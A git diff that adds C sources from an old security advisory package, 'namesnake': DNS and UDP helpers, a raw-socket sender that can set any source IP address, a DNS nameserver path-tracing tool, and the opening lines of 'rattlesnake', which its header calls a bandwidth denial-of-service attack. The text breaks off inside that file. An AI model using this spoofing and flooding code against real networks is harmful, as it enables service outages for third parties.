+ * dns / id queue handling routines
+ */
+
+#ifndef Z_DNS_H
+#define Z_DNS_H
+
+
+#include <sys/time.h>
+#include <arpa/nameser.h>
+#include <netinet/in.h>
+#include <libnet.h>
+
+
+/* dns flags (for use with libnet)
+ */
+#define DF_RESPONSE     0x8000
+#define DF_OC_STD_Q     0x0000
+#define DF_OC_INV_Q     0x0800
+#define DF_OC_STAT      0x1800
+#define DF_AA           0x0400
+#define DF_TC           0x0200
+#define DF_RD           0x0100
+#define DF_RA           0x0080
+#define DF_RCODE_FMT_E  0x0001
+#define DF_RCODE_SRV_E  0x0002
+#define DF_RCODE_NAME_E 0x0003
+#define DF_RCODE_IMPL_E 0x0004
+#define DF_RCODE_RFSD_E 0x0005
+
+
+#define SEG_COUNT_MAX   16
+
+typedef struct libnet_ip_hdr            ip_hdr;
+typedef struct libnet_udp_hdr           udp_hdr;
+typedef HEADER                          dns_hdr;        /* HEADER is in arpa/nameser.h */
+
+void    dns_handle (dns_hdr *dns, unsigned char *dns_data, unsigned int plen, int print);
+
+int     dns_segmentify (dns_hdr *dns, unsigned char *dns_data,
+                unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
+                unsigned char *d_addi[]);
+void    dns_seg_q (unsigned char **wp, unsigned char *d_arry[], int c, int max_size);
+void    dns_seg_rr (unsigned char **wp, unsigned char *d_arry[], int c, int max_size);
+int     dns_labellen (unsigned char *wp);
+
+/* dns_printpkt
+ *
+ * print a packet into the dns window
+ */
+
+void    dns_printpkt (char *os, size_t osl, dns_hdr *dns, unsigned char *data,
+                unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
+                unsigned char *d_addi[], int print);
+int     dns_p_print (char *os, size_t len, dns_hdr *dns, unsigned char *d_quer[],
+                unsigned char *d_answ[], unsigned char *d_auth[], unsigned char *d_addi[]);
+void    dns_p_q (unsigned char *dns_start, char *os, size_t len, unsigned char *wp);
+void    dns_p_rr (unsigned char *dns_start, char *os, size_t len, unsigned char *wp);
+void    dns_p_rdata (unsigned char *dns_start, char *rdstr, size_t len, u_short rtype,
+                unsigned char *rdp, u_short rdlen);
+int     dns_dcd_label (unsigned char *dns_start, unsigned char **qname, char *os, size_t len, int dig);
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/io-udp.c b/advisories/teso-advisory-003/namesnake/src/io-udp.c
new file mode 100644
index 0000000..277f17a
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/io-udp.c
@@ -0,0 +1,212 @@
+/* namesnake
+ *
+ * by scut
+ *
+ * udp packet routines include file
+ */
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#include <arpa/inet.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <libnet.h>
+#include "common.h"
+#include "io-udp.h"
+#include "network.h"
+
+
+void
+udp_listen_free (udp_listen *ul)
+{
+        if (ul == NULL)
+                return;
+
+        if (ul->socket != 0)
+                close (ul->socket);
+
+        free (ul);
+
+        return;
+}
+
+
+udp_listen *
+udp_setup (char *ip, unsigned short int port)
+{
+        int             n;      /* temporary return value */
+        udp_listen      *new = xcalloc (1, sizeof (udp_listen));
+
+        new->addr_serv.sin_family = AF_INET;
+        new->addr_serv.sin_port = htons (port);
+
+        if (ip == NULL) {
+                new->addr_serv.sin_addr.s_addr = htonl (INADDR_ANY);
+        } else {
+                new->addr_serv.sin_addr.s_addr = net_resolve (ip);
+                if (new->addr_serv.sin_addr.s_addr == 0)
+                        goto u_fail;
+        }
+
+        new->port = port;
+
+        /* aquire udp socket
+         */
+        new->socket = socket (AF_INET, SOCK_DGRAM, 0);
+        if (new->socket == -1)
+                goto u_fail;
+
+        n = bind (new->socket, (struct sockaddr *) &new->addr_serv, sizeof (new->addr_serv));
+        if (n == -1)
+                goto u_fail;
+
+        return (new);
+
+u_fail:
+        if (new->socket != 0)
+                close (new->socket);
+
+        free (new);
+
+        return (NULL);
+}
+
+
+void
+udp_rcv_free (udp_rcv *ur)
+{
+        if (ur == NULL)
+                return;
+
+        if (ur->udp_data != NULL)
+                free (ur->udp_data);
+
+        free (ur);
+
+        return;
+}
+
+
+udp_rcv *
+udp_receive (udp_listen *ul, struct timeval *tv)
+{
+        int             n;      /* temporary return value */
+        udp_rcv         *u_rcv; /* new received udp datagram */
+        unsigned char   *u_packet;
+        socklen_t       len;
+        fd_set          fds;
+
+        if (ul == NULL)
+                return (NULL);
+
+        u_rcv = xcalloc (1, sizeof (udp_rcv));
+        u_packet = xcalloc (1, IP_MAXPACKET);
+
+        len = sizeof (struct sockaddr_in);
+        FD_ZERO (&fds);
+        FD_SET (ul->socket, &fds);
+        n = select (ul->socket + 1, &fds, NULL, &fds, tv);
+        if (n <= 0)
+                goto ur_fail;
+
+        n = recvfrom (ul->socket, u_packet, IP_MAXPACKET, 0,
+                &u_rcv->addr_client, &len);
+        if (n == -1)
+                goto ur_fail;
+
+        /* save time the packet was received and copy the received data
+         */
+        gettimeofday (&u_rcv->udp_time, NULL);
+        xrealloc (u_packet, n);
+        u_rcv->udp_data = u_packet;
+        u_rcv->udp_len = n;
+        ul->count++;
+
+        return (u_rcv);
+
+ur_fail:
+        free (u_rcv);
+        free (u_packet);
+
+        return (NULL);
+}
+
+
+void
+udp_write (char *ip, unsigned short int port, unsigned char *data,
+        size_t data_len)
+{
+        int                     udp_sockfd;
+        struct sockaddr_in      udp_to;
+
+        udp_sockfd = socket (AF_INET, SOCK_DGRAM, 0);
+        if (udp_sockfd == -1)
+                return;
+
+        memset (&udp_to, '\0', sizeof (udp_to));
+        udp_to.sin_family = AF_INET;
+        udp_to.sin_addr.s_addr = net_resolve (ip);
+        udp_to.sin_port = htons (port);
+
+        /* send packet
+         */
+        sendto (udp_sockfd, data, data_len, 0, &udp_to, sizeof (udp_to));
+
+        close (udp_sockfd);
+
+        return;
+}
+
+
+void
+udp_send (char *ip_src, unsigned short int port_src,
+        char *ip_dst, unsigned short int port_dst,
+        unsigned char *data, size_t data_len)
+{
+        unsigned char           *data_enc,
+                                *pkt_buf;
+        unsigned short int      port_a_src;
+        size_t                  len;
+        char                    *ip_a_src;
+        int                     raw_socket;
+
+        ip_a_src = (ip_src == NULL) ? net_getlocalip () : xstrdup (ip_src);
+        port_a_src = (port_src == 0) ? libnet_get_prand (PRu16) : port_src;
+        pkt_buf = xcalloc (1, data_len + IP_H + UDP_H);
+
+        libnet_build_ip (UDP_H + len,           /* content length */
+                0,                              /* ip type of service */
+                libnet_get_prand (PRu16),       /* ip id */
+                0,                              /* we don't fragment */
+                64,                             /* ip ttl */
+                IPPROTO_UDP,                    /* ip subproto */
+                libnet_name_resolve (ip_a_src, 0),      /* ip source address */
+                libnet_name_resolve (ip_dst, 0),/* ip destination address */
+                NULL, 0,                        /* payload */
+                pkt_buf);
+
+        libnet_build_udp (port_a_src,           /* source port */
+                port_dst,                       /* destination port */
+                data,                   /* payload r0x0r */
+                data_len,                               /* payload length */
+                pkt_buf + IP_H);
+
+        raw_socket = libnet_open_raw_sock (IPPROTO_RAW);
+
+        if (raw_socket != -1) {
+                libnet_write_ip (raw_socket, pkt_buf, IP_H + UDP_H + len);
+
+                close (raw_socket);
+        }
+
+        free (pkt_buf);
+        free (data_enc);
+        free (ip_a_src);
+
+        return;
+}
+
diff --git a/advisories/teso-advisory-003/namesnake/src/io-udp.h b/advisories/teso-advisory-003/namesnake/src/io-udp.h
new file mode 100644
index 0000000..8a6775a
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/io-udp.h
@@ -0,0 +1,121 @@
+/* namesnake
+ *
+ * by scut
+ *
+ * udp packet routines include file
+ */
+
+#ifndef _FNX_IO_UDP_H
+#define _FNX_IO_UDP_H
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <stdio.h>
+
+
+/* udp receival entity
+ */
+
+typedef struct  udp_listen {
+        unsigned long int       count;  /* number of packets received */
+        struct in_addr          ip;     /* ip to receive data on */
+        unsigned short int      port;   /* port to receive data on */
+        int                     socket; /* listening socket */
+        struct sockaddr_in      addr_serv;
+} udp_listen;
+
+
+/* udp datagram structure
+ */
+
+typedef struct  udp_rcv {
+        struct sockaddr_in      addr_client;    /* source address */
+        struct timeval          udp_time;       /* time of receival */
+        socklen_t               udp_len;        /* length of the udp datagramm */
+        unsigned char           *udp_data;      /* received udp datagramm */
+} udp_rcv;
+
+
+/* udp_listen_free
+ *
+ * free a udp_listen structure pointed to by `ul'
+ *
+ * return in any case
+ */
+
+void    udp_listen_free (udp_listen *ul);
+
+
+/* udp_setup
+ *
+ * start a new listening udp service with the bound ip `ip', which can be
+ * either a numeric ip address or "*" (or NULL) for all locally available
+ * ip addresses. the listening port is `port'.
+ *
+ * return NULL on failure
+ * return a pointer to a udp_listen structure on success
+ */
+
+udp_listen      *udp_setup (char *ip, unsigned short int port);
+
+
+/* udp_rcv_free
+ *
+ * free a udp_rcv structure pointed to by `ur'
+ *
+ * return in any case
+ */
+
+void    udp_rcv_free (udp_rcv *ur);
+
+
+/* udp_receive
+ *
+ * receive an udp datagramm on the network entity specified by the `ul'
+ * structure
+ *
+ * return NULL on failure
+ * return a pointer to a new udp_rcv structure on success
+ */
+
+udp_rcv *udp_receive (udp_listen *ul, struct timeval *tv);
+
+
+/* udp_write
+ *
+ * send an udp datagram using the system level datagram sockets. send
+ * `data_len' bytes from `data' to the host with the ip `ip' on port
+ * `port'
+ *
+ * return in any case
+ */
+
+void
+udp_write (char *ip, unsigned short int port, unsigned char *data,
+        size_t data_len);
+
+
+/* udp_send
+ *
+ * send an udp datagram using raw socket. the datagram will be assigned the
+ * source ip address of the local host if `ip_src' is NULL and the source IP
+ * address `ip_src' if it is not. the source port will be random if `port_src'
+ * equals zero, else it is assigned the value of it.
+ * the destination ip address is `ip_dst', the destination port is `port_dst'..
+ * the payload is `data', which is `data_len' bytes long. the data will be
+ * encrypted with `key' if it is not NULL.
+ *
+ * return in any case
+ */
+
+void    udp_send (char *ip_src, unsigned short int port_src,
+        char *ip_dst, unsigned short int port_dst,
+        unsigned char *data, size_t data_len);
+
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/namesnake.c b/advisories/teso-advisory-003/namesnake/src/namesnake.c
new file mode 100644
index 0000000..4db4607
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/namesnake.c
@@ -0,0 +1,271 @@
+/* namesnake - dns path discovery and measurement tool
+ *
+ * by scut of teso
+ *
+ * main file
+ */
+
+#define VERSION "0.0.2"
+#define AUTHORS "scut of teso"
+
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <time.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include "common.h"
+#include "network.h"
+#include "dns-build.h"
+#include "dns.h"
+#include "io-udp.h"
+
+
+typedef struct {
+        char *  ip;
+        int     count_resp;
+} ns;
+
+char *  ns_domain;
+
+int     usage (char *program);
+ns **   ns_hop_trace (char *ip_snake, char *domain_our);
+void    snakeprint (ns **list, int indent);
+int     snakequick (char *ip_snake, char *domain_our);
+int     snake (char *ip_snake, char *domain_our);
+
+char *          mode = "trace";
+char *          ip_local = NULL;
+udp_listen *    ul;
+
+
+int
+usage (char *program)
+{
+        printf ("usage: %s <ourdomain> <nameserver> [mode]\n\n"
+                "ourdomain   the domain that references to our current ip\n"
+                "nameserver  the startpoint for the nameserver chain to trace\n"
+                "mode        either \"quick\" or \"trace\"\n\n",
+                program);
+
+        exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char **argv)
+{
+        char *          ip_bind = NULL;
+
+        printf ("namesnake "VERSION" by "AUTHORS"\n\n");
+
+        if (argc < 3)
+                usage (argv[0]);
+
+        if (argc == 4 && strcmp (argv[3], "quick") == 0)
+                mode = argv[3];
+
+        ip_local = net_getlocalip ();
+        ul = udp_setup (ip_bind, 53);
+        if (ul == NULL) {
+                fprintf (stderr, "failed to bind to port 53, try specifying a local ip to bind to\n");
+                exit (EXIT_FAILURE);
+        }
+
+        printf ("[ns] listener bound to %s:53\n", (ip_bind == NULL) ? "*" : ip_bind);
+        printf ("[ns] tracing %s through the help of our domain %s\n", argv[2], argv[1]);
+        printf ("===============================================================================\n");
+
+        srandom (time (NULL));
+
+        if (strcmp (mode, "quick") == 0)
+                snakequick (argv[2], argv[1]);
+        else
+                snake (argv[2], argv[1]);
+
+        udp_listen_free (ul);
+        exit (EXIT_SUCCESS);
+}
+
+
+ns **
+ns_hop_trace (char *ip_snake, char *domain_our)
+{
+        ns **           ns_ret = NULL;
+        int             ns_entry_count = 0;
+        char *          ip;
+        int             i,m;
+        dns_pdata *     dp;
+        char *          querydomain;
+        int             count = 0;
+        udp_rcv *       ur;
+        struct timeval  tv_start;
+        struct timeval  tv;
+        int             bc = 0;
+
+        gettimeofday (&tv_start, NULL);
+
+        /* construct and send dns query
+         */
+        dp = dns_build_new ();
+        querydomain = dns_build_random (domain_our, 0);
+        dns_build_q (dp, querydomain, T_A, C_IN);
+        dns_packet_send (ip_local, ip_snake, m_random (1024, 65535), 53,
+                m_random (1, 65535), DF_RD, 1, 0, 0, 0, dp);
+        dns_build_destroy (dp);
+
+        while (bc == 0) {
+                struct timeval  tv_now;
+
+                gettimeofday (&tv_now, NULL);
+                tv.tv_sec = 140 - (tv_now.tv_sec - tv_start.tv_sec);
+                tv.tv_usec = 0;
+
+                ur = NULL;
+                if ((tv_now.tv_sec - tv_start.tv_sec) >= 0)
+                        ur = udp_receive (ul, &tv);
+
+                if (ur != NULL) {
+                        dns_handle ((dns_hdr *) ur->udp_data, ur->udp_data + sizeof (dns_hdr), ur->udp_len, 0);
+                        if (strcmp (querydomain, ns_domain) == 0) {
+                                count++;
+
+                                net_printipa ((struct in_addr *) & ur->addr_client.sin_addr, &ip);
+                                m = 0;
+                                for (i = 0 ; ns_ret != NULL && ns_ret[i] != NULL ; ++i) {
+                                        if (strcmp (ns_ret[i]->ip, ip) == 0) {
+                                                ns_ret[i]->count_resp += 1;
+                                                m = 1;
+                                        }
+                                }
+                                if (m == 0) {
+                                        ns_entry_count += 1;
+                                        ns_ret = xrealloc (ns_ret, (ns_entry_count + 1) * sizeof (ns *));
+                                        ns_ret[ns_entry_count] = NULL;
+                                        ns_ret[ns_entry_count - 1] = xcalloc (1, sizeof (ns));
+
+                                        ns_ret[ns_entry_count - 1]->ip = ip;
+                                        ns_ret[ns_entry_count - 1]->count_resp = 1;
+                                }
+                        } else {
+                                printf ("*!* received unrelated packet\n");
+                        }
+                        udp_rcv_free (ur);
+                        free (ns_domain);
+                }
+
+                if (ur == NULL)
+                        bc = 1;
+        }
+
+        free (querydomain);
+
+        return (ns_ret);
+
+}
+
+
+int
+snakequick (char *ip_snake, char *domain_our)
+{
+        char *          ip;
+        dns_pdata *     dp;
+        char *          querydomain;
+        int             count = 0;
+        udp_rcv *       ur;
+        struct timeval  tv_start;
+        struct timeval  tv;
+        int             bc = 0;
+
+        gettimeofday (&tv_start, NULL);
+
+        /* construct and send dns query
+         */
+        dp = dns_build_new ();
+        querydomain = dns_build_random (domain_our, 0);
+        dns_build_q (dp, querydomain, T_A, C_IN);
+        dns_packet_send (ip_local, ip_snake, m_random (1024, 65535), 53,
+                m_random (1, 65535), DF_RD, 1, 0, 0, 0, dp);
+        dns_build_destroy (dp);
+        printf ("asking for %s\n", querydomain);
+        free (querydomain);
+
+        while (bc == 0) {
+                struct timeval  tv_now;
+
+                gettimeofday (&tv_now, NULL);
+                tv.tv_sec = 90 - (tv_now.tv_sec - tv_start.tv_sec);
+                tv.tv_usec = 0;
+
+                ur = NULL;
+                if ((tv_now.tv_sec - tv_start.tv_sec) >= 0)
+                        ur = udp_receive (ul, &tv);
+
+                if (ur != NULL) {
+                        count++;
+                        net_printipa ((struct in_addr *) & ur->addr_client.sin_addr, &ip);
+                        printf ("%s\t== ", ip);
+                        dns_handle ((dns_hdr *) ur->udp_data, ur->udp_data + sizeof (dns_hdr), ur->udp_len, 1);
+                        udp_rcv_free (ur);
+                }
+
+                if (ur == NULL)
+                        bc = 1;
+        }
+
+        fprintf (stderr, "%s %d\n", ip_snake, count);
+
+        return (1);
+}
+
+
+void
+snakeprint (ns **list, int indent)
+{
+        int     walker,
+                indent_tmp;
+
+        if (list == NULL)
+                return;
+
+        for (walker = 0 ; list[walker] != NULL ; ++walker) {
+                for (indent_tmp = indent ; indent_tmp > 0 ; --indent_tmp) {
+                        printf ("\t");
+                }
+                printf ("%3d %s\n", list[walker]->count_resp, list[walker]->ip);
+        }
+
+        return;
+}
+
+
+int
+snake (char *ip_snake, char *domain_our)
+{
+        ns ***          pathway;
+        ns **           base;
+        int             walker;
+        int             ns_count;
+
+
+        base = ns_hop_trace (ip_snake, domain_our);
+        if (base == NULL || base[0] == NULL)
+                return (0);
+
+        printf ("%s\n", ip_snake);
+        snakeprint (base, 1);
+        for (ns_count = 0 ; base[ns_count] != NULL ; ++ns_count)
+                ;
+        printf ("======== tracing pathway of %d servers ========\n", ns_count);
+
+        ns_count += 1;
+        pathway = xcalloc (1, sizeof (ns **) * (ns_count));
+        for (walker = 0 ; base[walker] != NULL ; ++walker) {
+                printf ("=== %s\n", base[walker]->ip);
+                pathway[walker] = ns_hop_trace (base[walker]->ip, domain_our);
+                snakeprint (pathway[walker], 1);
+        }
+
+        return (1);
+}
+
+
diff --git a/advisories/teso-advisory-003/namesnake/src/network.c b/advisories/teso-advisory-003/namesnake/src/network.c
new file mode 100644
index 0000000..4d56546
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/network.c
@@ -0,0 +1,362 @@
+/* namesnake
+ *
+ * network primitives
+ *
+ * by scut
+ *
+ * nearly all of this code wouldn't have been possible without w. richard stevens
+ * excellent network coding book. if you are interested in network coding,
+ * there is no way around it.
+ */
+
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <netinet/in.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "common.h"
+#include "network.h"
+
+
+int
+net_connect (struct sockaddr_in *cs, char *server, unsigned short int port,
+        int sec)
+{
+        int                     n, len, error, flags;
+        int                     fd;
+        struct timeval          tv;
+        struct sockaddr_in      tmp_cs;
+        fd_set                  rset, wset;
+
+
+        if (cs == NULL)
+                cs = &tmp_cs;
+
+        /* first allocate a socket */
+        cs->sin_family = AF_INET;
+        cs->sin_port = htons (port);
+        fd = socket (cs->sin_family, SOCK_STREAM, 0);
+        if (fd == -1)
+                return (-1);
+
+        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+                close (fd);
+
+                return (-1);
+        }
+
+        flags = fcntl (fd, F_GETFL, 0);
+        if (flags == -1) {
+                close (fd);
+
+                return (-1);
+        }
+
+        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1) {
+                close (fd);
+
+                return (-1);
+        }
+
+        error = 0;
+
+        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+        if (n < 0) {
+                if (errno != EINPROGRESS) {
+                        close (fd);
+
+                        return (-1);
+                }
+        }
+        if (n == 0)
+                goto done;
+
+        FD_ZERO (&rset);
+        FD_ZERO (&wset);
+        FD_SET (fd, &rset);
+        FD_SET (fd, &wset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+
+        n = select (fd + 1, &rset, &wset, NULL, &tv);
+        if (n == 0) {
+                close (fd);
+                errno = ETIMEDOUT;
+
+                return (-1);
+        }
+        if (n == -1)
+                return (-1);
+
+        if (FD_ISSET (fd, &rset) || FD_ISSET (fd, &wset)) {
+                if (FD_ISSET (fd, &rset) && FD_ISSET (fd, &wset)) {
+                        len = sizeof (error);
+                        if (getsockopt (fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+                                errno = ETIMEDOUT;
+                                return (-1);
+                        }
+                        if (error == 0) {
+                                goto done;
+                        } else {
+                                errno = error;
+                                return (-1);
+                        }
+                }
+        } else
+                return (-1);
+
+done:
+        n = fcntl (fd, F_SETFL, flags);
+        if (n == -1)
+                return (-1);
+        return (fd);
+}
+
+
+int
+net_accept (int s, struct sockaddr_in *cs, int maxsec)
+{
+        int             flags, n;
+        fd_set          ac_s;
+        int             len;
+        struct timeval  tval;
+
+        flags = fcntl (s, F_GETFL, 0);
+        if (flags == -1)
+                return (-1);
+        n = fcntl (s, F_SETFL, flags | O_NONBLOCK);
+        if (flags == -1)
+                return (-1);
+
+        FD_ZERO (&ac_s);
+        FD_SET (s, &ac_s);
+        tval.tv_sec = maxsec;
+        tval.tv_usec = 0;
+
+        n = select (s + 1, &ac_s, NULL, NULL, maxsec ? &tval : NULL);
+        if (n == 0)
+                return (0);
+
+        if (FD_ISSET (s, &ac_s)) {
+                len = sizeof (struct sockaddr_in);
+                n = accept (s, (struct sockaddr *) cs, &len);
+                if (n == -1) {
+                        switch (errno) {
+                        case EWOULDBLOCK:
+                        case ECONNABORTED:
+                        case EPROTO:
+                        case EINTR:     if (fcntl (s, F_SETFL, flags) == -1)
+                                                return (-1);
+                                        return (0);
+                        default:        return (-1);
+                        }
+                }
+                if (fcntl (s, F_SETFL, flags) == -1)
+                        return (-1);
+                return (n);
+        }
+        if (fcntl (s, F_SETFL, flags) == -1)
+                return (-1);
+
+        return (0);
+}
+
+
+void
+net_boundfree (bound *bf)
+{
+        close (bf->bs);
+        free (bf);
+
+        return;
+}
+
+
+bound *
+net_bind (char *ip, unsigned short int port)
+{
+        bound                   *b;
+        int                     br, gsnr, lr;
+        int                     len, reusetmp;
+        struct sockaddr_in      *sap;
+
+        if (port >= 65536)
+                return (NULL);
+
+        b = xcalloc (1, sizeof (bound));
+        b->bs = socket (AF_INET, SOCK_STREAM, 0);
+        if (b->bs == -1)
+                goto berror;
+
+        reusetmp = 1;
+#ifdef SO_REUSEPORT
+        if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEPORT, &reusetmp, sizeof (reusetmp)) == -1)
+                goto berror;
+#else
+        if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEADDR, &reusetmp, sizeof (reusetmp)) == -1)
+                goto berror;
+#endif
+
+        sap = (struct sockaddr_in *) &b->bsa;
+        sap->sin_family = AF_INET;
+        sap->sin_port = htons (port);           /* 0 = ephemeral */
+
+        if (ip != NULL) {
+                if (strcmp (ip, "*") == 0) {
+                        sap->sin_addr.s_addr = htonl (INADDR_ANY);
+                } else {
+                        if (!(sap->sin_addr.s_addr = net_resolve (ip))) {
+                                goto berror;
+                        }
+                }
+        } else {
+                sap->sin_addr.s_addr = htonl (INADDR_ANY);
+        }
+
+        br = bind (b->bs, (struct sockaddr *) &b->bsa, sizeof (struct sockaddr));
+        if (br == -1)
+                goto berror;
+
+        len = sizeof (struct sockaddr);
+        gsnr = getsockname (b->bs, (struct sockaddr *) &b->bsa, &len);
+        b->port = ntohs (sap->sin_port);
+        if (gsnr == -1)
+                goto berror;
+
+        lr = listen (b->bs, 16);
+        if (lr == -1) {
+                goto berror;
+        }
+        return (b);
+
+berror:
+        free (b);
+
+        return(NULL);
+}
+
+
+int
+net_parseip (char *inp, char **ip, unsigned short int *port)
+{
+        int     n;
+
+        if (inp == NULL)
+                return (0);
+        if (strchr (inp, ':') == NULL)
+                return (0);
+
+        *ip = calloc (1, 256);
+        if (*ip == NULL)
+                return (0);
+
+        n = sscanf (inp, "%[^:]:%hu", *ip, port);
+        if (n != 2)
+                return (0);
+
+        *ip = realloc (*ip, strlen (*ip) + 1);
+        if (*ip == NULL || (*port < 1 || *port > 65535))
+                return (0);
+
+        return (1);
+}
+
+
+char *
+net_getlocalip (void)
+{
+        struct sockaddr_in      pf;
+        char                    name[255];
+
+        memset (name, '\0', sizeof (name));
+
+        if (gethostname (name, sizeof (name) - 1) == -1) {
+                return (NULL);
+        }
+
+        pf.sin_addr.s_addr = net_resolve (name);
+
+        return (strdup (inet_ntoa (pf.sin_addr)));;
+}
+
+
+/* partly based on resolv routine from ?
+ */
+
+unsigned long int
+net_resolve (char *host)
+{
+        long            i;
+        struct hostent  *he;
+
+        if (host == NULL)
+                return (htonl (INADDR_ANY));
+
+        if (strcmp (host, "*") == 0)
+                return (htonl (INADDR_ANY));
+
+        i = inet_addr (host);
+        if (i == -1) {
+                he = gethostbyname (host);
+                if (he == NULL) {
+                        return (0);
+                } else {
+                        return (*(unsigned long *) he->h_addr);
+                }
+        }
+        return (i);
+}
+
+
+int
+net_printipr (struct in_addr *ia, char *str, size_t len)
+{
+        unsigned char   *ipp;
+
+        ipp = (unsigned char *) &ia->s_addr;
+        snprintf (str, len - 1, "%d.%d.%d.%d", ipp[3], ipp[2], ipp[1], ipp[0]);
+
+        return (0);
+}
+
+
+int
+net_printip (struct in_addr *ia, char *str, size_t len)
+{
+        unsigned char   *ipp;
+
+        ipp = (unsigned char *) &ia->s_addr;
+        snprintf (str, len - 1, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
+
+        return (0);
+}
+
+
+int
+net_printipa (struct in_addr *ia, char **str)
+{
+        unsigned char   *ipp;
+
+        ipp = (unsigned char *) &ia->s_addr;
+        *str = calloc (1, 256);
+        if (*str == NULL)
+                return (1);
+
+        snprintf (*str, 255, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
+        *str = realloc (*str, strlen (*str) + 1);
+
+        return ((*str == NULL) ? 1 : 0);
+}
+
+
diff --git a/advisories/teso-advisory-003/namesnake/src/network.h b/advisories/teso-advisory-003/namesnake/src/network.h
new file mode 100644
index 0000000..97054f4
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/network.h
@@ -0,0 +1,135 @@
+/* namesnake
+ *
+ * by scut
+ */
+
+#ifndef _FNX_NETWORK_H
+#define _FNX_NETWORK_H
+
+#include <sys/socket.h>
+#include <net/if.h>
+#include <netinet/in.h>
+#include <stdio.h>
+
+
+typedef struct bound {
+        int                     bs;     /* bound socket */
+        unsigned short          port;   /* port we bound to */
+        struct sockaddr         bsa;    /* bs_in */
+} bound;
+
+
+/* net_connect
+ *
+ * connect to the given `server' and `port' with a max timeout of `sec'.
+ * initialize the sockaddr_in struct `cs' correctly (ipv4), accept any
+ * ip "123.123.123.123" or hostname "localhost", "www.yahoo.de" as hostname.
+ * create a new socket and return either -1 if failed or
+ * the connected socket if connection has been established within the
+ * timeout limit.
+ *
+ * the routine is still IPv4 biased :-/
+ *
+ * return -1 on failure
+ * return socket if success
+ */
+
+int     net_connect (struct sockaddr_in *cs, char *server, unsigned short int port,
+        int sec);
+
+
+/* net_accept
+ *
+ * accept a connection from socket s, and stores the connection
+ * into cs.
+ * wait a maximum amount of maxsec seconds for connections
+ * maxsec can also be zero (infinite wait, until connection)
+ *
+ * return 0 if no connection has been made within maxsec seconds
+ * return -1 if an error appears
+ * return the socket number if a connection has been made
+ */
+
+int     net_accept (int s, struct sockaddr_in *cs, int maxsec);
+
+
+/* net_bind
+ *
+ * bind a socket to an ip:port on the local machine,
+ * `ip' can be either NULL (bind to all IP's on the host), or a pointer
+ * to a virtual host name, or a real IP, or "*" for any.
+ * `port' can be either 0 (ephemeral port), or any free port.
+ *
+ * return NULL on failure
+ * return pointer to bound structure on success
+ */
+
+bound   *net_bind (char *ip, unsigned short int port);
+
+
+/* net_boundfree
+ *
+ * free the bound structure pointed to by `bf'
+ *
+ * return in any case
+ */
+
+void    net_boundfree (bound *bf);
+
+
+/* net_parseip
+ *
+ * read an ip in the format "1.1.1.1:299" or "blabla:481" into
+ * the char pointer *ip and into the port *port
+ *
+ * return 0 on failure
+ * return 1 on success
+ */
+
+int     net_parseip (char *inp, char **ip, unsigned short int *port);
+
+
+/* net_getlocalip
+ *
+ * give back the main IP of the local machine
+ *
+ * return the local IP address as string on success
+ * return NULL on failure
+ */
+
+char    *net_getlocalip (void);
+
+
+/* net_resolve
+ *
+ * resolve a hostname pointed to by `host' into a s_addr return value
+ *
+ * return the correct formatted `s_addr' for this host on success
+ * return 0 on failure
+ */
+
+unsigned long int       net_resolve (char *host);
+
+
+/* net_printip
+ *
+ * print an IP address stored in the struct in_addr pointed to by `ia' to a
+ * string `str' with a maximum length of `len'.
+ *
+ * return 0 on success
+ *Üreturn 1 on failure
+ *
+ * net_printipa behaves the same way, except it allocates memory and let
+ * `*str' point to the string
+ *
+ * net_printipr behaves like net_printip, except the IP is printed in
+ * reverse quad dotted order (dns labels)
+ */
+
+int     net_printip (struct in_addr *ia, char *str, size_t len);
+int     net_printipa (struct in_addr *ia, char **str);
+int     net_printipr (struct in_addr *ia, char *str, size_t len);
+
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/rattlesnake.c b/advisories/teso-advisory-003/namesnake/src/rattlesnake.c
new file mode 100644
index 0000000..944b74c
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/rattlesnake.c
@@ -0,0 +1,157 @@
+/* rattlesnake - bandwidth denial of service attack
+ *
+ * by scut of teso
+ * (discovered by me too, see teso-i0006.txt)
+ *
+ * main file
+ */
+
+#define VERSION "0.0.2"
+#define AUTHORS "scut of teso"
+
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <time.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include "common.h"
+#include "network.h"
+#include "dns-build.h"
+#include "dns.h"
+#include "io-udp.h"
+
+
+int     usage (char *program);
+int     rattle (char *domain_victim);
+
+char *          ns_domain;
+char *          ip_local = NULL;
+int             ns_count,
+                ns_walker = 0;
+char **         ns_list = NULL;
+int             speed;
